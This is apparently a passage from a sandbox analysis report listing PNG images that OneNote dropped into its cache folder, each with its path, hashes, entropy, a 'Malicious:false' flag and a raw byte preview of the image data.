                                                                                                                                                                                                                  SSDEEP:384:1l+zN+iNurNE/tBdEC/vkape2XHYdhOm+Bl6C4:L+zN+iNurGNEC3fpe2X8Pa+
                                                                                                                                                                                                                  MD5:3A5CD52E925A7C4A345047D8F06C3C41
                                                                                                                                                                                                                  SHA1:9C02828D83206BBD3EB58930C8C65A6CA5DBCF40
                                                                                                                                                                                                                  SHA-256:477277E8CAAAE1D3B3EAB5B3660239AEEABC433743A191727B1A71E529872AC7
                                                                                                                                                                                                                  SHA-512:8D8B6AC645ECC7C8BD374E6190819006C71AC0B5993419C42463009116214E5EC4B4235D94B4AE4CDA132E7DDA9807ADC51525824AC5F12696517FFC8890891E
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR................R....sRGB.........gAMA......a.....pHYs..........o.d..>.IDATx^..|.....+)..H..C.K... ....x).rU..T..*E...;....*.@Z.....@...9q.g7[fgggg.............1//.."@....0..#.t..f.C..."@.....@OIR.#P...0..$...y.Pl"@....( @zJ]...." ...Si8R*D.....S..D....i...J.R!.D....R. .D..HC..T..... .D...... .D@.....p.T... ........ ... =..#.B.... =.>@........4.)."@....).."@...4.HO..H..."@.HO...."@..!@z*.GJ...."@zJ}...." ...Si8R*D.....S..D....i...J.R!.D....R. .D..HC..T..... .D...... .D@.....y.?.`.T... .f.P...$47........~E....!.D..X............].`....0..N.a...>[||...t.T.w *.. .....)'...=X?c.......+OE....<-84...=.....w.8...7.Ro&.D@!...GS.....s.......:...Gg..8..T...u...~..............<...S...../Y.......W........#. .vB...u.. .+.999YYY......wf..._.{6....=..]>Y?..;=02eb......2...;.%..\...P..R5....XMO.....6....W]...3g.5;.n{t.......F7S....r...[n.......AAX..j[.j.;.neef).2.....{ ..r..{7.-........i..S........<..pm.u.V....M.333....K..Mr.s..Ek..=t_.#.P...

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000000T.bin

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 454 x 278, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):13241
                                                                                                                                                                                                                  Entropy (8bit):7.931391290415517
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:384:a99pmP85w/MAMszG+iHGgrw8Ld+9aEsjQR:mgP85AMs6+UtrX+9mjQR
                                                                                                                                                                                                                  MD5:01367FEEE0A83E8765E971E0D3740900
                                                                                                                                                                                                                  SHA1:CAE1FD22CE2539FA2ACC0242C615CB7EA3F866E1
                                                                                                                                                                                                                  SHA-256:18B8E53505DA3C412890F4D74AE2A6B26C4B0827E15E830F92A024D292AF20ED
                                                                                                                                                                                                                  SHA-512:8CFBDC014C42AE6417038B80424D2E9FBDDD7DFDDF579E349C3C17C9B52AF33A72463154D29539457C4ADAB2DB00CC28A67902FA8D9209E4AF00EDD46D52E5CA
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR.............s>.Q....sRGB.........gAMA......a.....pHYs..........o.d..3NIDATx^...U...Y.]:.T...G.5..lX...B..Xb4F,I0X.....F...("vET4H......*EX........wo9..9.|...rw..;...;o......z.....B.......v.mn..>......E."....U...4s! ..F...u?.@...! .~F@... ....p..Q.kP.#! ...(U{@...!....T.TGB@...Q......B.5.D..A.......~.*.U{.].....S.e...K.A.......7^?....D...h;...!.Eu...o.^..B@..# J...B@....(.5(....B@..= ....p..Q.kP.#! ...(U{@...!....T.TGB@...Q......B.5.D..A........T..! ...k..R].R...! .D...B@..........:..B@..R........! Ju.Ju$......j...! .\C@.....H...! J....B@....(.5(....B@..= ....p..Q.kP.#! ...(U{@...!....T.TGB@...Q......B.5.D..A........T..! ...k.D.RK.K.m.V.......(.^^^ZV^Z.7.a..........T..xsqYi....L......z....}....?..yyy.M\.b..U3W.0{...~.`}..M%.J*.w.mdv.&*..@....R..o/.^..5...x.g.>..ag....GM|t....\<s..y+6.X.? ,.R...-.W.m\..o..0g..i...h..W.Z.i...2.....o.&..@...-.B|.K..^.....u.}.M..6...,(...e.V.X........nkE....5.8....-.!.TtRxs....Q..2}.-..`....mX6i.w...

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000000U.bin

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 164 x 89, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):4190
                                                                                                                                                                                                                  Entropy (8bit):7.94161730428269
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:96:GHfueo3dRLZKOSYDzGsEgfB9nqS0WKt/z2jOrrz7yrT7N:8A6AzZfBtqS0WKNC2vyx
                                                                                                                                                                                                                  MD5:8B3AEC1986A522951942BA72B85CCAA0
                                                                                                                                                                                                                  SHA1:7E0DC78FC65EE4C804A4B0C72AA53E2DFDF26C14
                                                                                                                                                                                                                  SHA-256:8B02CEC726DECF033B67689F369FDE1002ACFD5F8C32E0F248AC575997204F2F
                                                                                                                                                                                                                  SHA-512:8EE1A1F6F0023EB4F60760C2E23EAFD56E6D298CAB49D819CF1D62C0CCF608D4211D3767856255F7CF8FF45AD835FE5475EB92C608989C522CD48D00A050B189
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR.......Y.....?.......sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.]ip...fu.VBBZ..V'.>........CR......?r...pU\....v*...T~.U)0..('`....."..,a..Y..$t!...D...Mkvf4.VhW;S........{...zZw...i......fj..$..7......[Z*.[.[..Zk...?.t:M..,..`.^...X,..sUK[..Rg.=$..!.3<....74...iY..i...k.,.fA..Z.n...`G.%..H.l7..7J...u.R..6....E..!....N@.....M....Q`...U2.w.WP[!fX......c ./@7Mz....^...k.)....v.Q`..z..1A..P.{...||...vY.....>.`...K...m.?CX./v.8.....]..;...6..kw......N....z.Q...f..q..xk.5....;.?.Z.c...`......4....?.....VV.u~..<_......sU4e.....g.c.G....O/..r...`.G)....#d5.O..w..{....twL1l.)#&hF..K...M[@.Dl..V2..j.3..s....3M.....v..!....V..c..B...|..e.1....7.WA0.[.\.u.).$7f.+.......8..e2K/.%.Ii..`w6w.E..[?_.?.?..I.k2.s....]..f....HM.?w..d.9..Rr....Y.c.}.s.zk..rc...a..I(9~........m...Z............I........7.K:.:Bf.......m..1.......&..,...?a...c.@.@.g%...s.#...;..c6...g.lZ....}.WX.3.8.....W....N.w...L...}....?.".......;cI.............pS

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000000V.bin

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 162 x 89, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):4081
                                                                                                                                                                                                                  Entropy (8bit):7.943373267196131
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:96:KQJAeRumk2zXWySlEmWL9zi6wknB4qLx+ppNhQrW8Oy:Ke9S482LE6wQB6pNeqi
                                                                                                                                                                                                                  MD5:29B87BEEC5D3899824AA390530CD47FB
                                                                                                                                                                                                                  SHA1:55108E8E5692E4444F72EE5CEB91915E7A2AEFC8
                                                                                                                                                                                                                  SHA-256:F00E4F1C9B1D9ABEAAEC8E5CAB02A07FD74F00ACE15E36C6F6469DE5AB07A9FC
                                                                                                                                                                                                                  SHA-512:1A5AD45BBA8C29C32CDD3C4D1E460C30ECA305D851FAAC73DF165306BC338337525680B9906D367A0CD3852B9D2DAAA8FD0603276BA969495B4E29C7EC8A3530
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR.......Y.....2.h.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.].LTW.f..O.a.......*.....k...M.Z.n.q.h....ht.f.M.n.6..t.h.k.h5.6][[....X..p...?..g.`..7.o..of....^.ys..{.{...s.UMMM.(.l.@.l..R?.......(0+0.......5...*.F..#.].........1.....B[>[..a..L.....x...0.5t.v..S.h!.........Y....B..&.......f#.w5u...............0...x.sC....a.4j5V..Z..n....K..>...3t..wm..3hB.BD.P..FkcJ6.....O........7...S.........6..P.]mf.+o....w..<.......Y..Z.whd.....*zf+.....#."_?....`.._... qf+.?.?"k...zgME..j..!.k.U*.....&z..N....ma.......R.{.r0.S..KP..fU....g~..=..Q.n.*.* 8T=/'9,*.KDW...GN;0(P3_....1......'.;..;|.L.a.&<*\.d......o...Y... {E.F..}.e.\..=W..#..W....c./~..b.EWXI.#.''&.........:....X...b.....+2...5..6+)we~ja:lZ.d.Ey....l.2.5r........!.!._|.A.....j2.5.o.....WOM....V......GC9..'.... ....C..,._...cS....b.1.....t.........._........a.3..K..>V.f]...~....K...-........#.o.Y.P........a.7..,#..'s...T.....b..]..3..dPPP..Y.i...c.b

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000010.bin

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 452 x 277, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):22634
                                                                                                                                                                                                                  Entropy (8bit):7.974332204835705
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:384:5ojjyi45m1/9gyhgFsH1ud103Pl39o0qjfsH37mNHy7QPaNbZy0:+r45m1/BWKy10tN22rmNHycobE0
                                                                                                                                                                                                                  MD5:548D234C9AB4021CA5FAB7BF22502465
                                                                                                                                                                                                                  SHA1:2F7495D250DC86EA99473CC342D164B859926021
                                                                                                                                                                                                                  SHA-256:7D549C3418CD90F42571D00936B23D242837CE2A8B19FC4C719E182ECB2624C6
                                                                                                                                                                                                                  SHA-512:261523F5EAE6FCE2829B53AAC5938B1A0021C119E00CE82EFFDBD690FE71064E0F3B313ED1AB2F67A16C488AD5B1A91F5AF98029D88A7896F271C108410D42C5
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR.............._......sRGB.........gAMA......a.....pHYs..........o.d..W.IDATx^..i.=YY6z@..DP.i.IAA........l.Dd0"p0.ON.~....s>.?zbH8..%$`....b7..=....25*.".L. ..u_..f...j.........Uk..^UW]...u..}.{.]t.-.(...J......e...t.....@i.k......_.(.....@...Z.6J......2.O.-P....._.u.=T..4p...e..q..5^f~....@i`....?.....@i..k.........?...u..O|bN.~?MbT%...@.LO.Or.`....$..y.{..o....~..(.;......SNi...6....w....~.{..^w......~.S...g?../|.O........7_...Oj....|......40......9....?..<.3nw...x...g...7.....(<.d...(3.K...;....\..:...'.5.....&...>...t.;....8..SO;../...._.}.{..D.jt.......jc...s..........Z...0q...@......Z]S.(..o.....Og.u.l.i.-.9..)j..~...5.l}..........G......k....Z..c.....}.c.?.\....t+u...15p.....[|......2..;..;...........w...........v.7...I.-w...K/.J...[..N.....W..U#...._.j(...//z.|..kv....];j|../m....t.9.;-0.:.4p..@K.....~.9.$qu.E....!.9|.m.+`).|......x..vak-].../.....G'....4.>B6$.......-o.q..L;*.N+....>...=.!.Y..Q...?......7..,....}

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000011.bin

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):17289
                                                                                                                                                                                                                  Entropy (8bit):7.962998633267186
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:384:ruwwXKZuqnOnZprU3+OXBruY4UkcY+TpI/BSqCrEoMXMEr3KbzHIDqqAmk+xob:tGcxE4PBruV3Uy5SqCAoMXzrQHoqAk+m
                                                                                                                                                                                                                  MD5:708E8EB906BC105CCA0535AE669AA651
                                                                                                                                                                                                                  SHA1:38D82DEDFE97D3001188C2E18FE13BD741FD520F
                                                                                                                                                                                                                  SHA-256:1C3D07765294566E17270D0F3B9257A3DB7905D4E7EF746AEE80CD591CE0308F
                                                                                                                                                                                                                  SHA-512:1EFC74C28190DEE2D2732390B74049A1B120F05EFB8DC6925207C6990AD20450FFAB40249899A9DBB82E8F92A61F770E120A450CAAC7F8C5F0742586CCE0EDB6
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR................R....sRGB.........gAMA......a.....pHYs..........o.d..C.IDATx^...Uc.._"oB.Hr.m(.0......r..[1.D....R..q)%FBDiB.."w*.k.Jz.Y..l....>...9{.......g..Y.z~..k?.z.^k..+V...! ....(.....\sM.tD@...!P...HW.S....u^.....@.r.^.....B@...U.H.J....... }....".....>....! ..A@.4..EE...! }*...B@....i<8.....B@.T2 .........xp..! .....d@...!......(*B@....S....B ...O..QT........! ..@<.H......! ..O%.B@...x..9...C'|..{.>Z../~^.s<<V4..ujo..v.Z7..EwT.....@.....?.......~{...K.........C........bB@.$.....C.{....Kf'S.....T.*&....@<.....'..D`...;~v.DT]...r!..>....ru...}.....#uG.T.....>..z ...3v....P.M.....5.@<...?....F.}..c.W[.._!P...O..>.M.d<..J....E .}ZZ.+.5v.p>..N.{B....>M.Nzfb...OB@.." }.D.y...IdK<..! }.:.....f.K..bX.T9...&T.&?.VB9.[B@..@@.4..1}.4.@H..-!..}..~M.<.z..I}.G....>..S...N..@yj..n..s.d._.....(..R"....Wf\.oO.^...\h.\.`)...ni.'.].vk.1-.k.^....#.,}.{.RM...~Z.S.. .@U!.&}......h...{K..@.........W.8.N.s.Y.0)..f+...%4.......5.@j.):k.+3...I..(

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000012.bin

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 452 x 278, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):13737
                                                                                                                                                                                                                  Entropy (8bit):7.916899917415529
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:384:jgxmx2Fa/+76A6M6Y7rSYRv47cwbkkapeIiRmDGd+gUwOSpQ:KgyoWrJWRkkRXmad+gE8Q
                                                                                                                                                                                                                  MD5:830632032C7DDBCCDE126F4BAE935540
                                                                                                                                                                                                                  SHA1:9FEF1DA9FF1D7762B779553B5F873BE54C8D01EF
                                                                                                                                                                                                                  SHA-256:2328D09EC845433DC31808FD6B12616F1D28B9B3BA7DD969ADEB6C32D8EB049A
                                                                                                                                                                                                                  SHA-512:5C17EF9A0063499F2C34FAB2C4D968D29E20F20868921FA914E5737995AA0C166F224995109FF7ACA57B5B0F8647715DC670C4AEE385F61B5F8E6E8422C49EA8
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR.............w.pl....sRGB.........gAMA......a.....pHYs..........o.d..5>IDATx^....E...,"o.....&....AY$....AE..".l....+G.>AP@D..e..".".A.Y.@...K..IXB !..!..c1.On...===3=.3=.>9O..u....w.z..-].t9]B@...!.......Z...B@...^G`.Q.&S..u$d....B.Y..P.w5[]......B.m.D...! ..@...Ls.Q"....."S....B ..D.9.(.B@.....b@...!..."..@..! ....T1 ........i. J....B@d....B@...4..%B...! 2U...! .r@@d....!......*......9 2..D...B@..L..B@..........D..! .D...! ..@...Ls.Q"....."S....B ..D.9.(.B@.....b@...!..."..@..! ....T1 ........i. J....B@d....B@...4..%B...! 2U...! .r@@d....!......*......9 2..D...B@......5jT.@.{..O.;k....>.._o.+......{V...&C..(?.m.....F....gd.....?.....3u..x^L.1n^...@../.....XE....L..!...t.....L..B.).=..sn..U........@.O..$..o..L.....g.(D...(....Lo8.....,....f;o..i.f.h.9........\./..[W.9.....+....,X..+.d.....Xc..7.p.m.Yg.u:YO.V..l.t.].Z.g.U...]...5.^..._.~.WL...o.3f..s.,Y.X.7.x5...K/-..._.......{........W.(Y....?...!....W;.....iwNMW.............@+Q.5.#.

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000013.bin

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 185 x 76, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):2332
                                                                                                                                                                                                                  Entropy (8bit):7.8822150338370776
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:48:jB5Gg4vMs30WIn5IVeRy1bY7DqbqQBAeNjukXlN4AXat:PGYuEWV/YH7e1uA0AXat
                                                                                                                                                                                                                  MD5:91CB7F1273AA003076401081B8A22237
                                                                                                                                                                                                                  SHA1:5157144069E7D2FDAE60B397BE5851E75BDF7707
                                                                                                                                                                                                                  SHA-256:80682DD6472E8D1136BC5E20F6DE87B595562414B19EAB8E965736FE992921B0
                                                                                                                                                                                                                  SHA-512:5A8E3C0ED0DB94BFE359C63793F12F3D7B3C37F3A13A5C96634BA1DC8C9E50FB1142FE4752FD9FBFA39A682F78C54AF868AD337EAA787801FE5F66D8F55A8196
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR.......L.............sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.\.LUe......Ji("....9....-.."..5L.Y.Y.....$350.."2.lK3Cg...T..DWZ.......i.?!<..~x..z.......w.sw......9....s...w..l6.:....p"dH...F..B<...qE,R$G\!..E..".).#...."..{f.PyI.d..l;....;.=.S...O.S[.\Y^P.aj]9*Y!. ..~..#...S.s...l..h.[m....%...P..@.kG......G..X.r|%..AO.}-..G>35..c....Ac.&[W.d..+...zG........=..l...VS.d..+...tGd..k-._.....oL.:}.p.~.W$C..|...I...n...~......,.i......e..=..?{......>r~.Lw.+2..\w.)w~...c....h..u..%...PE...f..'..m.ZE.1.\....U.`X......$...P%..UH{[K..o7~.k.49..W.t.~.^_..7.,....f."q....+....;...~;.c.......Xb.\?...........0h.lV..WX!.....ljm.1c..U...[..X.)......B=.0~..W...rO..j...ehI5U:..66V5sJ.....V...]Y>...1kQH..2.........d....S....I...+..].p.....m7...Z....s.D>.K/]..?.l....2..=..~.mq..".+.....,..8. v.o.).Z......>..Xv..i...TA....M.....>[X...Y.7lJ..e7..S.....02q.O&9.......:L....N.......W....d..FqE..T..N.....R....kXv[..j......g.K.\@`.M..B}8n

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000014.bin

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):11332
                                                                                                                                                                                                                  Entropy (8bit):7.9324721568775285
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:192:vpXZavBpl00n1Pt7JquG9GYHDK/5cxektxMQjcie9ZZkx30eXJIb8FKRN:vpZaDyc1P1Je9G62/5clpjre9nQkeXJY
                                                                                                                                                                                                                  MD5:31579CA3352DF8FA4E3E7F48C7CDF672
                                                                                                                                                                                                                  SHA1:AA682A3C781BF8EE43B5EDC9718E64CB79135F25
                                                                                                                                                                                                                  SHA-256:B0E7824BEE2C896279457D87E61E902431BEB528D830524CC4DFAE126E89FC24
                                                                                                                                                                                                                  SHA-512:782FF9492E3ECB11C72D316DDD94D1F3E94CD908FC9452A37DA6CA30ABCFE9AB2BCCED8583A569DA68626BCEC730408AF86997E295637BF64AFF5BC768F3E309
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR................R....sRGB.........gAMA......a.....pHYs..........o.d..+.IDATx^.{...u./-...&....6..+z..Q."b*. &M.d-e.*.. ....J..Z-T.Z$....R..F...%*`bn..<.....W.E ..w....^...;g..[w.5w.9g...3......t8t.P.?$@.$@.5...=.8qb.... ...5...a=...#.y. ...@B.....am. .. .......$@.$`.....G.B.$@..S... ...C.zj.#[!.. ..).......!@=..........}..H.........VH..H.z.>@.$@.v.PO.pd+$@.$@=e. .. .;...v8... ...................f.o_o{....~t...n.S.N..?..._..L;J.H ..,....7.}...|....7...b...|.........ObVa1. .?.X.....~.....t2..V>.b.}..0.F....%`GO7.n#~..F....K.~...FX..H.^....k.Z/.2v.W..M.<.;$...v.t..,UO.-]............D.....o.J..Y........5.%.l....{.....'O..dC$....=uks..;{x.,.N.=.."..Q]..w>.E.H........AV=...f.&. ..ip}._0.~[pf.`..9..v.W.,..2.E.$P........+...OcC.H..=..|..[..g%(h.....W...?...UDh..T$..?....|.]..)?[Wo.h.'..2P.1..!.......$.NO.5..}...c.;...~.x,|Q....B..6.@>..y..}...m...D~z....L#.0`_.`.s?|....I.....a...=N....c.._.2.._..6 .]...5....{.^>.lM..;n...k..9J..S.G..{.

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000015.bin

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 167 x 92, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):4181
                                                                                                                                                                                                                  Entropy (8bit):7.943341403425058
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:96:b6JWqvCl45Da8kuGzhRwZvwIutfij19MQ8EpW14LBGJVCq:b6JTCl45DalsBws1R8914V5q
                                                                                                                                                                                                                  MD5:817D5A35EDB2B0E052194D4F49FDA19C
                                                                                                                                                                                                                  SHA1:FA6CB2016C5F43B76102B63D60359139227E07EA
                                                                                                                                                                                                                  SHA-256:0A87B8418B7F8E6E117BADDA11D7CDD38B8B7320C6BA3D3E9AF93EB9ACB2CE14
                                                                                                                                                                                                                  SHA-512:E0686BDBFC589401F0EAAE2B1598199EFA285F8392742B1C928B9274088804B23DCB584B6FEF68CE6D7E54DFF9C10338104F4C0F3F80A04471F0B2E8F9935CC0
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR.......\......!2a....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.]iPTW..iv..D.....%DQ#A$...d..h,.T~..+...TM\cj*.)k.fj~L~$...L&...,...:.FdU..f_......._.n.m.....q.s.9.=..w.9......$..b.*..%....@A]A..%..<......l.h.+../..OSe.....]...>..C........^cCy.0nz.4<......g..?~..>.1ws.B....07W65.74T....=..v.......D....6.....tR....}]}....4z..^....7..;.."......^.....|=.#.=.32..o.<.Tn*Q....g.zN...n*...!/.........!....F..]...6...m...CX..~...+..U...E.|.........7]=rE?i(..$`e.%.`.....w._.Y...l.1...@....t.P..=.}..*...N...N.|.xS.5&.....Pe......Z.Z^XJkx.....^.....?7..._....Wsz......}G..]...\.....,[.y....}.J....'.R?a...G5..l.i.?....MH..l.DC^._.c.m.....%{;z.&.*+x;...S.....zxyH..`.._]...el^........U.T..^..p..z[.6(2x..,#;o##..}Zv|Z..............V.....0}Z....]..m.....x..).k]&e.._.W!Vry..%...I..d..}w.....^..\............m[.^.3r.......-8......j....>...Q..T..{\V\ptH.?........1..w....FHl...x.....\.`.ei.w..)`...g..V{..Z.....8..........o.._..

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000016.bin

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 221 x 77, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):2599
                                                                                                                                                                                                                  Entropy (8bit):7.903700862190034
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:48:PmCwDJh8w9JewaF2zQNXXj8zq1KM43sxXxjYbTgJW1MFsrJ075CawGjGj:P1Ah8UewaFcgz82Kx8xXNYb3id/yj
                                                                                                                                                                                                                  MD5:E88131C9AAC52649FF044905ACAB9B76
                                                                                                                                                                                                                  SHA1:34AE73B9165CBED0DDF33AC20E4B3E7D622C19BF
                                                                                                                                                                                                                  SHA-256:30F22340F582F9A352A7ED3048D1088F178E83CCAACAC1CCFD86852C8F9C78E3
                                                                                                                                                                                                                  SHA-512:97AFE8F3A2A3138613934AC737C390A35F6757BFC3D381EA7C7CD148F739932380DCD46D0BA6F590C274F8BFB4D4286B3C0433AA69E090102A8A9ABDD7C97EB1
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR.......M.............sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.]kl.U....B|E..>...*..Q........b[.K........m.(..... ...!%1%*-B.C~(&`[.....-.....~.w3..Kw.3wvfzn.2{..s.....{w..\....!.3..:..!..../..zD.x...O.K... ^.1*...8.G...z...D.$...........>!..V..`v.CQQQ!..-L...../3.2......ZH.?s...Iu\N..,3.?.p..N......<....E.<.=z..Iu<ll.dX...g....+.{X.p.....:..t...a...cKK.|...Yszl.N.:......KPs.):).T.5...&B...*..5j``@...(_r.V.j..m...?x.sg...t\.dz.'^.=.\.h..<.y....:.I...w..ze.m.\.qPJu.....D.|..@......W..t.+.....X....e....\H+.Ns%^r.VS.N.3:...&...._..#^....d! ..F.....xc..M...q...17.z...z&C...K9(.Ifm.35.v.>.'X,...p.:=.H...J.K.,...:~...7.t.....R..R..9..?....l../.(...0z0.M.f.)H..Y_"e......B........L...q.K......|;..L.........xI.K3.M..%........./..){....R....s...7....).q.._R.4O.a3......<..%....3#.|>..y...u...R'.P..$Klz...........,...g.....`.7..\...x>.{p\;>+.,.....e.-..Re@.N..FY_....*....]}...[..h.M.oq.S.U...c_}`......8TP....

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000017.bin

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 232 x 50, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):1570
                                                                                                                                                                                                                  Entropy (8bit):7.780157858994452
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:48:r+em8Tlk2APr2fEd72tTqiVJlcLzqeVzYwS:r+erTlk5S+zoyGahS
                                                                                                                                                                                                                  MD5:EF9AA5B2ADBE5DF68AC4F4D716DF7708
                                                                                                                                                                                                                  SHA1:363B93AAAB9DB2832F6CA0EE3C27C9310C344BA8
                                                                                                                                                                                                                  SHA-256:3D94FCC4821A135ABAAE6579011441B94F9C04DAD1E66BB5211B0C019A5968B9
                                                                                                                                                                                                                  SHA-512:EC9B024AEA46F7B97D14F0A7E12704D09B85F0017CC9E273CE50F2F889DFDAE81DE549CCD546BBB8F8BAAAAAB7781FEF77BF783E02CCC9605304552F7DD5903D
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR.......2......n.f....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.[MK.W...t!.fU..b!....*JBA......%-.F.4$.Nw].....E.$...)T......?@.O{...3w..y.=/"o.9...<.y...X....c.1P6..e.lx....0..J....e3.&\.@)............o.*>.E,;.....~..|....Z.3`K..W0S.&.L._..M.e.`..M.....i_.......\...6g..^....4..L.Y.9.$M...4..L.Y.9.$M...4..L.Y.9.$M...4..L.Y.9.$M...4..2.......q...&...........*.Qg.+.p.......a.:.X6...o2......A.....[).,.p......P......_..>......3.......z8j............>...fww.6....../....S<......^%.4........{.N$..`.!H....`........a..(.G^>~|txx....K\mF..'d.d:9J!.....j..i24.A...`O.......s.....?={....H'._..~..O......*>...ZXX.3...;C....\....%..s=...w<h.......0....~..y..._.......+.n.P.M]c...A..Er|.R...$.g...9*._.jg.....x...&+.JWM4xe..^....0...11.[.....f....r#.h.h$....[=t >...r....L.0.KL..B\..x........4J.0....vY...\dA. w...........g....};.}.....;.......x.|.....)......x....s....N.$.n..g<Z.q.a9.C.....oX..%,KNNN..i.8J..p].1....B>{......n.D|3t.-\g...Q

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000018.bin

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
